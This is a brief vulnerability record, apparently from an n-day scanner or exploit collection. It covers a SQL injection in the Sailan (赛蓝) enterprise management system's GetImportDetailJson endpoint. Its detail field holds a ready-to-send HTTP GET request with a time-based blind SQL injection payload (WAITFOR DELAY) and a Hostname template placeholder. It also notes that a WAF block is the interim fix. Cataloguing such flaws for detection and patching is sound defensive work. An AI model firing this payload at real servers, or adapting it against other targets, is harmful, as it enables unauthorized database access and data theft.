vendor = "赛蓝"
name = "赛蓝企业管理系统GetImportDetailJson存在SQL注入漏洞"
type = "SQL注入"
version = "未知"
path = "/BaseModule/ExcelImport/GetImportDetailJson"
detail = "GET /BaseModule/ExcelImport/GetImportDetailJson?ImportId=1%27%3bWAITFOR+DELAY+%270%3a0%3a5%27--&IsShow=1 HTTP/1.1 Host: {{Hostname}}"
fix = "WAF封禁路路径，等待发布补丁"
date = "0813"
label = "nday"
